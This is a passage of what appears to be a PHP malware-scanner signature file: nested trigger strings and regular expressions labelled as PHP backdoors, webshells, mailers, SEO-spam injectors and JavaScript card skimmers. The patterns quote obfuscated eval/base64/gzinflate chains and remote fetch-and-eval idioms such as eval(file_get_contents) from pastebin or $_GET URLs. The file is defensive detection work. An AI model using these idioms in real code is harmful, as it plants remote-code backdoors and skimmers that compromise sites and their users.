		'x63\\\x6F\\\x69\\\x6E\\\x68\\\x69\\\x76\\\x65' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.002.02', 'var\s*_\w+\s*=\s*\[[^@]+x7C..x63..x6F..x69..x6E..x68..x69..x76..x65[^]]+\]\s*;\s*eval\(function\(_\w+[^}]+}\s*;\s*if\(\!_\w+[^}]+}\s*;\s*\w+\s*=\s*\[function\(\w+\)\s*\{return[^{]+{\s*return[^{]+{\s*if\(\w+[^}]+}\s*}\s*;\s*return\s*\w+\s*}\s*\([^}]+}\s*\)\s*\)\s*\;'),
		'\@?eval\s*\(\s*(\$\w+)\s*\)\s*;\s*(\$\w+)?\s*=\s*[\'"][^;]+;\s*\@\s*\2\s*\(\1\)\s*;\s*\@\s?eval\s*\(\1\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.assert.027', '\@?eval\s*\(\s*(\$\w+)\s*\)\s*;\s*(\$\w+)?\s*=\s*[\'"][^;]+;\s*\@\s*\2\s*\(\1\)\s*;\s*\@\s?eval\s*\(\1\)\s*;'),
		'eval(htmlspecialchars_decode(gzinflate(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.uploader.263', NULL),
		'$u\x73er-\x3e\x61\x6c\x6c\x63ap\x73[\x27\x61d\x6d\x69n\x69\x73tra\x74o\x72\x27' => array(STR_CLEARFILE, 'php.hacktool.downloader.008', NULL),
		'<\?php eval\(str_rot13\(gzinflate\(base64_decode\("[^;]+\\\\x[^;]+\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.041', 'eval\(str_rot13\(gzinflate\(base64_decode\("[^;]+\\\\x[^;]+\);'),
		'@eval\(\$[O0]+\[.[\w]+.\]\(\$[O0]+\[.[\w]+.\]\([^;]{1000,}' => array(REX_CLEARFILE, 'php.malware.obfuscated.042', NULL),
		'\x28\x61\x72\x72\x61\x79\x28\x27\x23\x73\x21\x73\x23\x27\x2C\x27\x23\x65\x21\x65\x23\x27\x2C\x27\x23\x30\x21\x30\x23\x27\x2C\x27\x23\x30\x72\x30\x23\x27\x2C\x27\x23\x30\x6E\x30\x23\x27\x29\x2C\x61\x72\x72\x61\x79\x28\x27\x3C\x27\x2C\x27\x3E\x27\x2C\x22\x5C\x30\x22\x2C\x22\x5C\x72\x22\x2C\x22\x5C\x6E\x22\x29\x2C\x6F\x62\x5F\x67\x65\x74\x5F\x63\x6C\x65\x61\x6E\x28\x29\x29\x3B\x66\x6F' => array(STR_CLEARFILE, 'php.malware.obfuscated.060', NULL),
	),

	'__FILE__' => array(STR_TRIGGER,

		'=fopen(__FILE__,\'r\');fseek($' => array(STR_TRIGGER,
			'eval(bzdecompress($' => array(STR_CLEARFILE, 'php.backdoor.filesman.042', NULL),
		),

		'IonCube_loader' => array(STR_TRIGGER,
			'<\?php[\s]\/\/[\w\s]{1,10}[\s]*if[\s]*\(!extension_loaded\(.IonCube' => array(REX_CLEARFILE, 'php.backdoor.fake_IonCube.001', NULL),
		),

		'(isset($_GET[' => array(STR_TRIGGER,
			'(~base64_decode(' => array(STR_CLEARFILE, 'php.backdoor.curl.020', NULL),
		),

		'eval(base64_decode(' => array(STR_TRIGGER,
			'FD1FJg167z2fvvRfdNJBFTogsCltSORac35' => array(STR_CLEARFILE, 'php.backdoor.encrypted.006', NULL),
		),

		'$gz=$f4($f2($c0),364);' => array(STR_CLEARFILE, 'php.backdoor.gzinflate_binary.001', NULL),
		'<title>Small Web Shell by ZaCo' => array(STR_CLEARFILE, 'php.backdoor.zacoshell.001', NULL),
		'>The "HoeflerText" font wasn\'t found.<' => array(STR_CLEAR_MULTIMATCH, 'html.malware.dropper.002', '<script>\s*if\s*\([^(]+?\(\s*\)\s*\{\s*search\s*=\s*unescape[^-]+?-[^<]+?<\/style>(?:[^>]+?>){1,10}The "HoeflerText" font wasn\'t found\.<[^!]+?![^,]+?,[^>]+?>\s*(?:<\/body>\s*)?<\/html>'),
		'%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72' => array(STR_CLEARFILE, 'php.hacktool.generic.009', NULL), 
		'goto TWOFISH; AES: eval($is($evil(' => array(STR_CLEARFILE, 'html.phishing.apple.018.02', NULL),
	),

	'$GLOBALS' => array(STR_TRIGGER,

		'echo @$GLOBALS[$GLOBALS[' => array(STR_TRIGGER,

			']] = $_COOKIE;' => array(STR_TRIGGER,
				'$GLOBALS[$GLOBALS[\'' => array(STR_CLEARFILE, 'php.malware.GLOBALS.004', NULL),
			),

			'] = "\x' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.sv1_0_1.001', '\$(?:GLOBALS|\{[^\}\s]+\})\[(.\w+.)\]\s*=\s*.(.x[0-9a-f]{1,2}){32}[^;]+;\s*\$GLOBALS\[(\$GLOBALS\[\1\]\[\d+\]\.){2}[^\?]+eval\(\$\w+\[\$GLOBALS\[\1[^\?]+\}[^\}]+\}'),
		),

		'";$GLOBALS[\'' => array(STR_TRIGGER,
			'\'] = ${$' => array(STR_TRIGGER,
				'\']); } $GLOBALS[\'' => array(STR_TRIGGER,
					']); echo $' => array(STR_TRIGGER,
						'\'])) { eval($GLOBALS[\'' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.061', '\$[\w][\d]+="[^\x12]+";\$GLOBALS\[\'[\w]+\'\] = \$\{\$[\w][\d]+\[[\d]+\][\s]*\.\$[^{]+if \(!empty\(\$GLOBALS[^{]+\]\)\) \{ eval\(\$GLOBALS[^{]+echo \$[\w][\d]+\[[\d]+[^;]+\$[\w][\d]+\[[\d]+\];'),
					),
				),
			),
		),

		'cs_auth' => array(STR_TRIGGER,
			'$data = @unserialize(cs_decrypt(base64_decode($data), $data_key));' => array(STR_CLEARFILE, 'php.malware.cs_auth.001', NULL),
		),

		',);echo@$' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.sv1_0_1.002', '\$GLOBALS\[[\'"](\w+)[\'"]\](=Array\(\))?;global\$\1;\$\1=\$GLOBALS;\$[^;]+(\\\\x[0-9a-f]{1,2}){10}";\$\1\[\$\1[^\?]+eval[^\(]*\(\$\w+?\[\$\1[^\)]+\);\s*\}\s*(exit..;\s*)?\}'), //modified by PG - covers more samples + less regex steps
		'eval($GLOBALS["chunkarr"][' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.chunkarr.001', '<.php\s*.GLOBALS..chunkarr..=array\([^\)]+\);\s*eval..GLOBALS..chunkarr..\[\d{3}\]..GLOBALS[^\}]+return .GLOBALS..chunkarr..;\s*\}\s*.>'),
		')]($_POST["content"]));' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.092', '(:?\$GLOBALS.._\d{9,}_..=Array.base64_[^<]+><\?php )?function _\d{9,}\(\$i\)\{\$a=Array[^\}]+\}\s*\?><\?php \$GLOBALS[^&]+&&\s*\$GLOBALS[^>\?;]+eval[^>\?;]+\.2\)\]\(\$_POST\["content"\]\)\);'),
		'VP8dVTyzXPRtnKAso2WdMJA0K2yhK3EurT9ho215XPOaMKEspT9mqS90' => array(STR_CLEARFILE, 'php.backdoor.WSO.016', NULL),
	),

	'file_get_contents' => array(STR_TRIGGER,

		'file_get_contents(__DIR__' => array(STR_TRIGGER,
			'base64_decode(zlib_decode($' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.048', NULL),
		),

		'eval(\'?>\'.$' => array(STR_TRIGGER,
			'\$[\w]+[\s]*=[\s]*file_get_contents\(.http[^;]+\);[\s]*eval\(.\?>.\.\$[\w]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_file_get_contents.009', '\$[\w]+[\s]*=[\s]*file_get_contents\(.http[^;]+\);[\s]*eval\(.\?>.\.\$[\w]+\);'),
		),

		'eval(file_get_contents(\'http' => array(STR_TRIGGER,
			'if[\s]*\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*eval\(file_get_contents\(.https?:\/\/.[\s]*.[\s]*\$_GET\[.[\w]+.\]\)\);[\s]*\}' => array(REX_CLEARFILE, 'php.backdoor.eval_file_get_contents.010', NULL),
		),

		'eval\([^)]*file_get_contents[^;]+https?:[^;]+\.(php|txt|js|phtml|html|htm)[^;][\)\s]*;' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_file_get_contents.001', 'eval\([^)]*file_get_contents[^;]+https?:[^;]+\.(php|txt|js|phtml|html|htm)[^;][\)\s]*;'),
		'eval(file_get_contents($_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_file_get_contents.002', '(?<=<\?php\s)(?:if\s*\(isset\s*\(\s*\$_GET\[[\'"]\w+[\'"]\s*\]\s*\)\s*\)\s*)?{?\s*eval\s*\(\s*file_get_contents\s*\(\$_GET\[[\'"]\w+[\'"]\]\s*\)\s*\)\s*;(\s*})?'),
		'eval(file_get_contents("http://pastebin' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_get_contents.027', '@?eval\(file_get_contents\("http:..pastebin[^;]+;'),
		'foreach (str_split(@file_get_contents(\'php://input' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_file_get_contents.006', '(\$\w+)\s*=\s*[\'"]\w+[\'"]\s*;\s*if\s*\(\s*isset\(\$_COOKIE\[\1\]\s*\)\s*\)\s*\{\s*(\$\w+)\s*=\s*str_rot13\(\$_COOKIE\[\1\]\s*\)\s*;\s*(\$\w+)\s*=\s*[\'"]{2}\s*;\s*foreach\s*\(\s*str_split\s*\(\s*\@file_get_contents\(\s*[\'"]\s*php:\/\/input\s*[\'"]\s*\)\s*,\s*strlen\(\2\)\s*\)\s*as\s*(\$\w+)\s*\)\s*{\s*\3\s*\.=\s*\4\s*\^\s*\2\s*;\s*}\s*eval\s*\(\s*\3\s*\)\s*;\s*}'),
		'eval("?>".(base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pastebin_uploader.011', '\$[\w]+[\s]*=[\s]*.(http|https):\/\/pastebin\.com[^;]+;[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\(\$[\w]+\);[\s]*eval\([^;]+\.\(base64_decode\(\$qwer\)\)\);'),
		'@eval(file_get_contents("http' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_get_contents.039', '@eval\(file_get_contents\(.https?:\/\/..\$_GET\[.[\w]+.\]\)\);'),
	),

	'=\'b' => array(STR_TRIGGER,
		'\'.\'' => array(STR_TRIGGER,

			'@eval($' => array(STR_TRIGGER,
				'(\$\w+)\s*=\s*[\'"\.base64_decode]{16,36}\s*;\s*\@eval\(\1\([QGVycm9yX3JlcG9ydGluZy\.\'"]{23,38}' => array(REX_CLEARFILE, 'php.malware.base64.034', NULL),
				'IVNNYWlsKHRyaW0oJGV4WyRjXSks' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.mailer.084', '\$(\w+)\s*=\s*["\'base64_decode\s\.]+\s*;\s*@?eval\s*\(\s*\$\1\s*\(\s*["\'][\w\/]+IVNNYWlsKHRyaW0oJGV4WyRjXSks[^;]+?;'),
				'dXJsZGVjb2RlKCRfUE9TV' => array(STR_CLEARFILE, 'php.hacktool.mailer.086', NULL),
				'kY10pKTsjIyN5ZXYKJHJf' => array(STR_CLEARFILE, 'php.backdoor.base64.007', NULL),
				'uZz1yYW5kKDEsMjU1KS4nLicucmF' => array(STR_CLEARFILE, 'php.backdoor.base64.008', NULL),
				'vL2Z0YWRqenJidg0KLy8vaHRtbg0KJHJlc' => array(STR_CLEARFILE, 'php.hacktool.mailer.113', NULL),
				'\$[\w]+[\s]*=[\s]*(.[A-Za-z0-9+\/]+.\.?)*[^;]+;[\s]*@?eval\(\$[\w]+\(.[\w]+.{500,}[\w]+.\)\);' => array(REX_CLEARFILE, 'php.hacktool.mailer.121', NULL),
			),

			'\';eval($' => array(STR_TRIGGER,
				'("cHJlZ19yZXBsYWNlKCIv' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.049', '(\$[\w]{15}[\w]+)=\'[\'\._base64dco]+;[\s]*eval\(\1\("cHJl[^"]+"\)\);'),
			),
		),
	),

	'urldecode(' => array(STR_TRIGGER,

		'urldecode(\'%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64' => array(STR_TRIGGER,
			'<\?php[\s]*\/\*[\s]*[Cc][Oo][Dd][Ee3][Dd]' => array(REX_CLEARFILE, 'php.backdoor.webshell.140', NULL),
			'+eWP8R2kvcuL+eWPYtjXvDuOsde4YtJF7KX==' => array(STR_CLEARFILE, 'php.backdoor.webshell.168', NULL),
		),

		'($OUT));return;' => array(STR_TRIGGER,
			';$OUT=alfa($OUT);eval($' => array(STR_CLEARFILE, 'php.backdoor.filesman.045', NULL),
		),

		'aWYgKHByZWdfbWF0Y2goJy9nb29nbGV8eWFob298bXNufGJvdHxiaW5nfGFvbHxzcGlkZXJ8c2V' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_downloader.021', '\$[0O]{4,}=urldecode\(.[^\']+\'\);\$[0O]{4,}=[^\{]+\{\d+[^;]+;\$[0O]{4,}[^\(]+\(\$[0O]{4,}\(\'[^=]+==\'\)\);'),
		'eWPIweXvcMlldoOzcbW+Nt9Md3ksNI0hNt9LDbC+Nt9jcB50cbw+eWP8R2kvcuL+eWPYtjXvDuOsde4YtJF7KX==alVnRPIq' => array(STR_CLEARFILE, 'php.backdoor.webshell.076', NULL),
		'CZILC2IpKXppcJIikoOiforpwuShFMa0fbkVwociduYlKXp9tmklfuaZdJELcoy0CTShgWplGol0KXP7VI`wNfrBfoguULSf' => array(STR_CLEARFILE, 'php.backdoor.filesman.047', NULL),
		'PD9waHANCmlmKGVtcHR5KCRfQ09PS0lFWydteXBhc3MnXSkpICRfQ09PS0lFWydt' => array(STR_CLEARFILE, 'php.backdoor.webshell.181', NULL),
		'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmN' => array(STR_CLEARFILE, 'php.backdoor.uploader.315', NULL),
	),

	'eval($' => array(STR_TRIGGER,

		'(strrev("/+./"),' => array(STR_TRIGGER,
			'strrev(implode("", array(' => array(STR_TRIGGER,
				'strrev("\x6b" . "\x63" . "\x61" . "\x62"' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.138', NULL),
			),
		),

		'if (preg_match($' => array(STR_TRIGGER,
			'QGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5' => array(STR_CLEARFILE, 'php.backdoor.WSO.014', NULL),
		),
		
		'.paste.se/raw");' => array(STR_TRIGGER,
			',CURLOPT_URL,"http:' => array(STR_CLEARFILE, 'php.backdoor.curl.016', NULL),
		),

		'strrev(implode("", array(' => array(STR_TRIGGER,
			'(strrev("/+./"), function ($' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.139', NULL),
		),

		'$_=($__=@' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.114', '\$_[\s]*=[\s]*\(\$[\w]*=@[\w]*\).[\s]*\(\$[\w]*=@[\w]*\).(\$[\w]*;|\+\+\$[\w]*;|\$[\w]*\+\+;)*[^)]+eval\(\$[\w]+\(\$[\w]*\(.([\w]+[\W]*)*.\)\)\);'),
		'xbzXjvRaciZ6rXmMjblogQPROwkCDl3SJb3nmYFAJr337uknt640vbu' => array(STR_CLEARFILE, 'php.mailer.generic.037', NULL),
		'7b3tctu4sij6O6tqvQ' => array(STR_CLEARFILE, 'php.backdoor.filesman.129', NULL),
	),

	'eval(${$' => array(STR_TRIGGER, 

		'].$' => array(STR_TRIGGER, 

			'\x' => array(STR_TRIGGER,
				']}.=chr(ord(${${"' => array(STR_CLEARFILE, 'php.backdoor.eval_chr.002', NULL), //priority - should be before php.backdoor.eval_isset.001 !
			),

			'echo "SORRY KILLED' => array(STR_TRIGGER,
				'if(is_writable($dr.\'/wp-includes/pomo' => array(STR_CLEARFILE, 'php.backdoor.injector.115', NULL),
			),

			'\$[\w]+[\s]=[\s]*"[posteru_]{8}";[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][\s]*\.\$[\w]+\[' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval_gen.005.02', '\$\w+[0-9]+\s*=\s*.[posteru_]+.\s*;\s*\$\w+[0-9]\s*=\s*(\$\w+.[0-9].\s*\.?\s*)+[^>]+\s*;\s*if\s*\(\s*isset[^>]+\[\s*.q\w*.\s*\][^;]+;\s*\}'), //modified by PG
			'strtoupper[\s]*\([\s]*\$[\w]+\[[\s]*[\d]+[\s]*\][\s]*\.[\s]*\$' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.eval_gen.005.01',  '\\$\\w+[0-9]?\\s*=\\s*.[post_]+.\\s*;\\s*\\$\\w+[0-9]?\\s*=\\s*strtoupper\\s*\\(\\s*\\$[^;]+\\s*;\\s*if\\s*\\(\\s*isset[\\s]*\\([\\s]*\\$\\{[\\s]*\\$[^{]+\\{[\\s]*eval[\\s]*\\([\\s]*\\$[\\s]*\\{[\\s]*\\$[^)]+\\][\\s]*\\)[\\s]*;[\\s]*}'), //order matters! by PG
			'if(isset(${$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_isset.001', '\$[\w]+[\s]*=[\s]*[\'"][^;]+[\'"][\s]*;[\s]*(\$[\w]+[\s]*=[^;]+\][\s]*\.[\s]*\$[^;]+;[\s]*)*if[\s]*\([\s]*isset[\s]*\([\s]*\$[\s]*\{[\s]*\$[\w]+[^\{]+\{[\s]*eval[\s]*\([\s]*\$[\s]*\{[\s]*\$[\w]+[^;]+;[\s]*\}[\s]*'),
		),

		'[0].$' => array(STR_TRIGGER,
			';if\(isset\(\$\{\$\w+\[\d+\]\.\$\w+\[\d+\]\.\$\w+\[\d+\]' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval.006', '\$(\w+)=.[^\(]+[^;]+;if\(isset\(\$\{\$\1\[\d+\].\$\1\[\d+\]\.\$\1[^\{]+\{eval\(\$\{\$\1[^\}]+\}\[\$\1[^;]+\;\}'),
		),

		'SMTP CRACKER' => array(STR_CLEARFILE, 'php.hacktool.mailer.142', NULL),
	),

	'";eval(' => array(STR_TRIGGER, 

		'"\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";' => array(STR_TRIGGER,
			'"\x72\x61\x77\x75\x72\x6c\x64\x65\x63\x6f\x64\x65";' => array(STR_TRIGGER,
				'"\x62\x61\x73\x65\66\x34\x5f\144\145\x63\157\144\x65";' => array(STR_TRIGGER,
					'\$[\w]+[\s]*=[\s]*".x...x...x...x...x[^;]+;[\s]*\$[\w]+[\s]*=[\s]*".x...x...x...x[^\(]+eval\([^\)]+[\)\s]+;' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.webshell.211', '\$[\w]+[\s]*=[\s]*".x...x...x...x...x[^;]+;[\s]*\$[\w]+[\s]*=[\s]*".x...x...x...x[^\(]+eval\([^\)]+[\)\s]+;'),
				),
			),
		),

		'= range("' => array(STR_TRIGGER,
			'<< 8) + ord(' => array(STR_CLEARFILE, 'php.backdoor.filesman.053', NULL),
		),

		'DQoJCUBlcnJvcl9yZXBvcnRpbmcoMCk7DQoJCUBpbmlfc2V0KCdlc' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.015', NULL),
		'aWYoISRfQ09PS0lFW2Jhc2U2NF9kZWNvZGUo' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.251', '\$[\w]+[\s]*=[\s]*"[base64_dco"\.]+;[\s]*\$[\w]+[\s]*=[\s]*.aWYoISRfQ09PS0lFW2Jh[^;]+;[\s]*eval\(\$[\w]+\(\$[\w]+\)\);'),
		'ICAgICRwcHJ0cyA9IHBhcnNlX3VybCgkdXJsKTsKICAgICAgICAgJHBfdXJsID0gImh0dHA6Ly8iLiRzcnZubS4kX1NFUlZFUlsi' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.116', '\$[\w]+[\s]*=[\s]*[\'"][^;]+;eval\(\$[\w]+\([^;]{2000}[^;]+\);'),
		'eval(decodeURIComponent(_twemoji));' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.078', 'var _twemoji=.function[^"]+";[\s]*eval[^;]+\);'),
	),

	'eval(@' => array(STR_TRIGGER,

		'modx_manager' => array(STR_TRIGGER,
			'@eval(@gzuncompress(@str_rot13(@base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.048', '@eval\(@gzuncompress\(@str_rot13\(@base64_decode\(.{1024}[^;]+;\s*die;'),
		),

		'eval(@file_get_contents(@$_GET' => array(STR_CLEAR_LINEMATCH,'php.backdoor.file_get_contents.008', 'eval.@file_get_contents.@._GET[^;]+;'),
		'eval(@gzinflate(base64_decode(' => array(STR_CLEAR_LINEMATCH,'php.backdoor.webshell_gen.044','eval.@gzinflate.base64_decode.[^;]*;'),
		'@eval(@str_rot13(@gzinflate(@str_rot13(@base64_decode("nZV4i9pAFIY/SvA' => array(STR_CLEAR_LINEMATCH,'php.malware.magento-cc-stealer.005', '@eval.@str_rot13.@gzinflate.@str_rot13.@base64_decode..nZV4i9pAFIY[^;]+Q8=".....;'),
		'@eval(@file_get_contents(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_get_contents.025', '\@eval\(\@file_get_contents\([^\)]+\)\s*\)\s*;'),
	),

	'decodeURIComponent' => array(STR_TRIGGER,
		'eval(decodeURIComponent(\'%28%' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.SoakSoak.001', 'eval.decodeURIComponent..%28%[^;]+\\)\\);'),
		'eval(decodeURIComponent(\'%0D%' => array(STR_CLEAR_LINEMATCH,'js.spam-seo.SoakSoak.002', 'eval.decodeURIComponent..%0D%0A%76%61%72%20%5F%5F[^;\)]+\)\);'),
		'%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.SoakSoak.003', 'eval.decodeURIComponent..[^;\)]+?%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66[^;\)]+\)\);'),
		'url(#default#homepage)\';var a = obj.setHomePage(\'//www.baidu.com' => array(STR_CLEARFILE, 'html.phishing.baidu.001', NULL),
	),

	'this[\'eval\'](' => array(STR_TRIGGER,
		'if\x28\x28n\x65\x77\x20R\x65gExp' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.002.04', 'this\[\'eval\'\]\(\'if.x28.x28n.x65.x77.x20R.x65gExp[^\']+\'\);'),
		'20snd' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.002.03', 'this\[.eval.\]\((this\[.unescape.\]\()?[\'\"][^\'\"]*20snd[^\'\"]+[\'\"]\)+;'),
		'this[\'atob\']' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.027', 'this\[.eval.\]\(this\[.atob.\]\s*\(.aWYoKG5ldyBSZWdFeHAoJ29uZXBhZ2V[^\)]+\)\)\;'),
		'\165m\145n\164\56\167ri\164\145\50\47\76\164pircs' => array(STR_CLEAR_LINEMATCH, 'js.malware.script_reversed.003', '<script>this\[\'eval\'\]\(\'if[^\2]+pircs[^;]+;\s*<\/script>'),
	),

	'eval/*' => array(STR_TRIGGER,
	
		'\'1\'=>\'' => array(STR_TRIGGER,
			'[$i]]) ? $' => array(STR_CLEAR_MULTIMATCH, 'php.malware.obfuscated.016', '(?:if\s*\(\!defined\(.ALREADY_RUN_\w+.\)\s*\)\s*{\s*define\s*\(.ALREADY_RUN_\w+.\s*,\s*\d\s*\);\s*)?\$\w+\s*=\s\d+; function \w+\(\$\w+,[^\}]+?\[\$i\]\]\) \? \$[^\}]+?\}\s*\$\w+[^\}]+\}[^\(]+Array\(.\w.=>.\w.,[^\)]+\);\s*eval\/\*\w+\*\/\(\w+\([^\)]+\)\);(?:\s*})?'), //modified by PG to cover variant
		),

		'*/$_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.075', '@eval[\s]*[\/\*]{2}[^;]+\$_POST[^;]+;'),
		'*/(get_option(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.075.02', '@eval[\s]*[\/\*]{2}[^;]+\(get_option\([^;]+;'),
	),

	'#!/usr/bin/php -q' => array(STR_TRIGGER,
		'eNrtW' => array(STR_TRIGGER, 
			'eNrtWmtTG0my/SuMw7HYMY6de' => array(STR_CLEARFILE, 'php.spam-seo.unicode_vars.001', NULL),
			'eNrtWWtPW1cW/SsERTVo' => array(STR_CLEARFILE, 'php.spam-seo.unicode_vars.002', NULL),
			'eNrtWetSU1kafRWkrA7UUO' => array(STR_CLEARFILE, 'php.spam-seo.unicode_vars.003', NULL),
		),
	),

	'eval(atob' => array(STR_TRIGGER,
		'cz0namc' => array(STR_CLEAR_LINEMATCH, 'js.hacktool.mage_shoplifter.001.001', '<script[^;]+eval\(atob\(.cz0namc[^>]+;<.script>'),
		'dmFyI' => array(STR_CLEAR_LINEMATCH, 'js.hacktool.mage_shoplifter.001.02', 'eval\(atob\(.[^;]{1000}[^;]+\);'),
		'ZXZhbChm' => array(STR_CLEAR_LINEMATCH, 'js.hacktool.mage_shoplifter.001.003', 'eval\(atob\(.ZXZhbChm[^\)]+\)\s*\)\s*;'),
	),

	');eval(eval(' => array(STR_TRIGGER,
		'*/;(function(){var' => array(STR_CLEAR_LINEMATCH, 'js.malware.eval_hex.002', '\/\*[^\*]+\*\/;\(function\(\)\{var [\w]+="";var [\w]+=[^;]+;[^}]+;}[^}]+eval\(eval\(.String\.fromCharCode[^}]+\}\)\(\);\/\*[^\*]+\*\/'),
		'if($feature == "widgets")' => array(STR_CLEAR_MULTIMATCH, 'js.malware.eval_hex.003.001', '(.\*[0-9a-f]+\*.)\s*if\(\$feature\s*==\s*.widgets.\)\{\s*echo\s*.<script\s*type[^>]+>\s*\(function\(\)\{var\s*(\w+)[^;]+;var\s*(\w+)[^>]+7769[^>]+eval\(eval\(.String.fromCharCode\(.\+\2\+[^>]+\}\)\(\);\s*<.script>.;\}\1'),
		'(function(){var ' => array(STR_CLEAR_MULTIMATCH, 'js.malware.eval_hex.003', '(?:(echo\s*.)?<script\s*type[^>]+>\s*|\w+=\w+\.substring\(0,[^;]+?;\s*eval[^;]+?;\s*\}\s*\)\s*\(\s*\)\s*;?\s*;?\s*)?\(function\(\)\{var\s*(\w+)[^;]+;var\s*(\w+)[^>]+7769[^>]+eval\(eval\(.String.fromCharCode\(.\+\2\+[^>]+\}\)\(\);\s*(?:<.script>(.;)?)?'),
	),

	'"\x62\x61\x73\x65\x36\x34\x5' => array(STR_TRIGGER, 
		'eval($_b($newphrase));' => array(STR_CLEARFILE,'php.backdoor.filesman.026', NULL),
		'($con7ext' => array(STR_CLEARFILE, 'php.backdoor.con7ext_shell.001', NULL),
		'eval($gzc($b64($r13' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.119', '(if[\s]*\(isset\(\$_GET\[[^\]]+\]\)\)[\s]*\{[\s]*)?\$[\w]+[\s]*=[\s]*array\([^;]+\);[\s]*\$[\w]+[\s]*=[\s]*implode\(..,[\s]*\$[\w]+\);[^\}]+eval\(\$gzc[^;]+;([\s]*exit[^;]*;[\s]*\})?'),
	),

	'FOPO - Free Online PHP Obfuscator' => array(STR_TRIGGER,
		'Checksum: 34d3990d882fde91e559cca6a72d559814be9d2a' => array(STR_CLEARFILE, 'php.backdoor.filesman.029', NULL),
		'Checksum: ac062a934f16e2a43f8cb2c33b59a8c5f47370ba' => array(STR_CLEARFILE, 'php.backdoor.filesman.029.002', NULL),
		'="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($' => array(STR_CLEARFILE, 'php.malware.FOPO.001', NULL),
	),

	'= Array(\'' => array(STR_TRIGGER,

		'\'=>\'' => array(STR_TRIGGER,
			'= \'\';' => array(STR_TRIGGER,
				'for($i=0; $i < strlen($' => array(STR_TRIGGER,
					'.= isset($' => array(STR_TRIGGER,
						'return base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.filesman.041', NULL),
					),
				),
			),
		),

		'file_get_contents(' => array(STR_TRIGGER,
			'"max_execution_time' => array(STR_TRIGGER,
				'$TARGET_HOST/scanner?scan_id=$scan_id&token=$token' => array(STR_CLEARFILE, 'php.hacktool.site_scanner.001', NULL),
			),
		),
	),

	'str_rot13(\'tmhapbzcerff\')' => array(STR_TRIGGER,
		'str_rot13(strrev(\'rqbprq_46rfno\')); eval($' => array(STR_TRIGGER,

			'<?php error_reporting(0);' => array(STR_TRIGGER,
				'{return true;}' => array(STR_CLEARFILE, 'php.spam-seo.redirect.097.02', NULL),
			),

			'rqbprq_46rfno\')); eval($' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.097', '\$[\w]+[\s]*=[\s]*str_rot13\(.tmhapbzcerff.\);[\s]*(\$[\w]+[\s]*=[\s]*.[\w]+.;)?[\s]*\$[\w]+[\s]*=[\s]*str_rot13\(strrev\(.rqbprq_46rfno.\)\);[\s]*(eval\([^;]+\);[\s]*)+'),
		),
	),

	'--><?php' => array(STR_TRIGGER,

		';if(isset(${$' => array(STR_TRIGGER,
			']])){eval(${$' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.009', '<\?php\s*\$(\w+)=\'[^\']+\'\(\w+\'\;\s*if\(isset\(\$\{\$(\w+)\[\d{2,}\].\$\1\[\d{2,}\].\$\1\[\d{1,}\][^\)]+\)\)\s*\{eval\(\$\{\$\1[^\)]+\)\;\}\s*\?>'),
		),

		'"));?><!--' => array(STR_TRIGGER,
